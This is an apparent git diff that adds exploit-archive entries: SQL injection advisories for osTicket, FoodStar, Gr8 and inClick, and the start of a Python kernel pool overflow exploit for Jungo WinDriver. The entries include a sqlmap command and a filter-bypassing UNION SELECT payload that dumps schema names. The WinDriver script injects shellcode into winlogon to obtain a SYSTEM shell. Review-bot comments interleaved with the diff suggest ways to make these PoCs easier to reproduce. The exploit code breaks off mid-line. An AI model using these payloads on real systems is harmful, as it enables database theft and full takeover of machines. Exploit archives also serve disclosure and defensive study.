+3. VERSIONS AFFECTED
+========================================
+osTicket < 1.10
+
+5. Technical Details & POC
+========================================
+Please visit an advisory URL for technical details.
+
+PoC code:
+python sqlmap.py -u "
+http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL
+
+6. RISK
+========================================
+The vulnerability allows remote attackers to execute a sql query on
+database system.
+
+7. REFERENCES
+========================================
+https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
diff --git a/platforms/php/webapps/42661.txt
new file mode 100755
index 000000000..50a7b018d
--- /dev/null
+++ b/platforms/php/webapps/42661.txt
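Review bot: The affected range is stated three ways that disagree — `Versions Affected: <= v1.10` in section 1, `osTicket < 1.10` in section 3, and plain `osTicket 1.10` in the files.csv entry — and since the title says v1.10 itself is vulnerable, section 3 should read `osTicket <= 1.10` and name the fixed release. The sqlmap command is broken across two lines after `-u "`, so pasting it as written gives an unterminated shell string; it belongs on one line, `python sqlmap.py -u "http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL`, with a note that the `*` is sqlmap's injection marker rather than part of the payload. Minor: the CVSS vector lacks its `CVSS:3.0/` prefix and the section numbering skips from 3 to 5.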
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: FoodStar Swiggy Clone Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 12.09.2017
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/foodstar-swiggy-clone/
+# Demo: http://abservetechdemo.com/products/foodstar/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/public/frontend/search?keyword=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42662.txt
new file mode 100755
index 000000000..a77a68f11
--- /dev/null
+++ b/platforms/php/webapps/42662.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Gr8 Multiple Search Engine Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 12.09.2017
+# Vendor Homepage: http://www.gr8script.com/
+# Software Link: http://www.gr8script.com/multiple_search_script.php
+# Demo: http://www.gr8script.com/multiple_search/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/X[SQL]/X.html
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42663.txt
new file mode 100755
index 000000000..a0663a1f0
--- /dev/null
+++ b/platforms/php/webapps/42663.txt
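Review bot: `search?keyword=[SQL]` is a placeholder only — no payload, injection type or authentication state is given — and the files.csv entry calls the product `FoodStar 1.0` while the title here says `FoodStar Swiggy Clone Script 1.0`. Adding the tested payload in the `Type/Title/Payload` form the 8bitsec advisories in this commit use, and stating whether `public/frontend/search` is reachable without a login, would make the finding verifiable; the index title should match the file.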
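Review bot: The PoC `http://localhost/[PATH]/X[SQL]/X.html` injects into a rewritten path, but the advisory never names the script or parameter that `X[SQL]` is routed to, so the vendor cannot locate the vulnerable query and a reader cannot tell what `X` stands for. Naming the underlying handler (and the rewrite rule, if that is how `.html` paths are routed — to be confirmed) plus one concrete payload with its observed result would make it reproducible.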
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: inClick Cloud Server 5.0 - SQL Injection
+# Dork: N/A
+# Date: 12.09.2017
+# Vendor Homepage: http://www.inclick.net/
+# Software Link: http://www.inclick.net/pageid/demo.html
+# Demo: http://www.inclick.net/pageid/demo.html
+# Version: 5.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an publisher to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/client.php?pageid=sites&subpid=modify&site_id=[SQL]
+#
+# 1-1++/*!00008UniOn*/+/*!00008sEleCT*/+0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129--+-
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/local/42665.py
new file mode 100755
index 000000000..fdf5e9917
--- /dev/null
+++ b/platforms/windows/local/42665.py
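Review bot: The only hint that this needs an authenticated publisher account is the sentence `The vulnerability allows an publisher to inject sql commands....`; the header should say so explicitly, e.g. `# Authentication: publisher login required (client.php)`, and the typo should be `a publisher`. The payload's `/*!00008UniOn*/` and `/*!00008sEleCT*/` are MySQL version-comment filter-bypass forms and `1-1++` just closes the numeric `site_id`, so the underlying finding is a plain 11-column `UNION SELECT` on `site_id`; saying that helps the vendor fix the query rather than the filter. A one-line note that `0x3c6c693e` is `<li>` and `0xa3a` a newline-colon separator, used to dump `table_name:column_name` from `information_schema.columns`, would make the long payload readable.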
@@ -0,0 +1,435 @@ +# -*- coding: utf-8 -*- +""" +Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability + +Download: http://www.jungo.com/st/products/windriver/ +File: WD1240.EXE +Sha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba +Driver: windrvr1240.sys +Sha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad +CVE: CVE-2017-14344 +Author: Steven Seeley (mr_me) of Source Incite +Affected: <= v12.4.0 +Thanks: @dronesec & @FuzzySec ! + +Summary: +======== + +This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. + +The specific flaw exists within the processing of IOCTL 0x95382673 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel. + +Timeline: +========= + +2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com +2017-08-25 – No response from Jungo and two bounced emails +2017-08-26 – Attempted a follow up with the vendor via website chat +2017-08-26 – No response via the website chat +2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it" +2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release +2017-09-06 – No response from Jungo +2017-09-06 – Public 0day release of advisory + +Exploitation: +============= + +This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token and dec a controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process. 
+ +References: +=========== + +- https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf +- https://github.com/hatRiot/token-priv + +Example: +======== + +C:\Users\user\Desktop>whoami +debugee\user + +C:\Users\user\Desktop>poc.py + + --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] + Steven Seeley (mr_me) of Source Incite + +(+) attacking WinDrvr1240 for a data only attack... +(+) sprayed the pool! +(+) made the pool holes! +(+) leaked token 0xa15535a0 +(+) triggering pool overflow... +(+) allocating pool overflow input buffer +(+) elevating privileges! +(+) got a handle to winlogon! 0x2bd10 +(+) allocated shellcode in winlogon @ 0xc0000 +(+) WriteProcessMemory returned: 0x1 +(+) RtlCreateUserThread returned: 0x0 +(+) popped a SYSTEM shell! + +C:\Users\user\Desktop> + +in another terminal... + +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32>whoami +nt authority\system + +C:\Windows\system32> +""" +from ctypes import * +from ctypes.wintypes import * +import struct, sys, os, time, psutil +from platform import release, architecture + +ntdll = windll.ntdll +kernel32 = windll.kernel32 +MEM_COMMIT = 0x00001000 +MEM_RESERVE = 0x00002000 +PAGE_EXECUTE_READWRITE = 0x00000040 +STATUS_SUCCESS = 0x0 +STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 +STATUS_INVALID_HANDLE = 0xC0000008 +SystemExtendedHandleInformation = 64 + +class LSA_UNICODE_STRING(Structure): + """Represent the LSA_UNICODE_STRING on ntdll.""" + _fields_ = [ + ("Length", USHORT), + ("MaximumLength", USHORT), + ("Buffer", LPWSTR), + ] + +class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): + """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" + _fields_ = [ + ("Object", c_void_p), + ("UniqueProcessId", ULONG), + ("HandleValue", ULONG), + ("GrantedAccess", ULONG), + ("CreatorBackTraceIndex", USHORT), + ("ObjectTypeIndex", USHORT), + ("HandleAttributes", ULONG), + ("Reserved", ULONG), + ] + 
+class SYSTEM_HANDLE_INFORMATION_EX(Structure): + """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" + _fields_ = [ + ("NumberOfHandles", ULONG), + ("Reserved", ULONG), + ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), + ] + +class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): + """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" + _fields_ = [ + ("Name", LSA_UNICODE_STRING), + ("Reserved", ULONG * 22), + ] + +class PROCESSENTRY32(Structure): + _fields_ = [ + ("dwSize", c_ulong), + ("cntUsage", c_ulong), + ("th32ProcessID", c_ulong), + ("th32DefaultHeapID", c_int), + ("th32ModuleID", c_ulong), + ("cntThreads", c_ulong), + ("th32ParentProcessID", c_ulong), + ("pcPriClassBase", c_long), + ("dwFlags", c_ulong), + ("szExeFile", c_wchar * MAX_PATH) + ] + +def signed_to_unsigned(signed): + """ + Convert signed to unsigned integer. + """ + unsigned, = struct.unpack ("L", struct.pack ("l", signed)) + return unsigned + +def get_type_info(handle): + """ + Get the handle type information to find our sprayed objects. + """ + public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() + size = DWORD(sizeof(public_object_type_information)) + while True: + result = signed_to_unsigned( + ntdll.NtQueryObject( + handle, 2, byref(public_object_type_information), size, None)) + if result == STATUS_SUCCESS: + return public_object_type_information.Name.Buffer + elif result == STATUS_INFO_LENGTH_MISMATCH: + size = DWORD(size.value * 4) + resize(public_object_type_information, size.value) + elif result == STATUS_INVALID_HANDLE: + return None + else: + raise x_file_handles("NtQueryObject.2", hex (result)) + +def get_handles(): + """ + Return all the processes handles in the system at the time. + Can be done from LI (Low Integrity) level on Windows 7 x86. 
+ """ + system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() + size = DWORD (sizeof (system_handle_information)) + while True: + result = ntdll.NtQuerySystemInformation( + SystemExtendedHandleInformation, + byref(system_handle_information), + size, + byref(size) + ) + result = signed_to_unsigned(result) + if result == STATUS_SUCCESS: + break + elif result == STATUS_INFO_LENGTH_MISMATCH: + size = DWORD(size.value * 4) + resize(system_handle_information, size.value) + else: + raise x_file_handles("NtQuerySystemInformation", hex(result)) + + pHandles = cast( + system_handle_information.Handles, + POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ + system_handle_information.NumberOfHandles) + ) + for handle in pHandles.contents: + yield handle.UniqueProcessId, handle.HandleValue, handle.Object + +def we_can_spray(): + """ + Spray the Kernel Pool with IoCompletionReserve and Event Objects. + The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. + These are allocated from the Nonpaged kernel pool. + """ + handles = [] + for i in range(0, 50000): + handles.append(windll.kernel32.CreateMutexA(None, False, None)) + # could do with some better validation + if len(handles) > 0: + return True + return False + +def alloc_pool_overflow_buffer(base, input_size): + """ + Craft our special buffer to trigger the overflow. + """ + print "(+) allocating pool overflow input buffer" + baseadd = c_int(base) + size = c_int(input_size) + + input = struct.pack("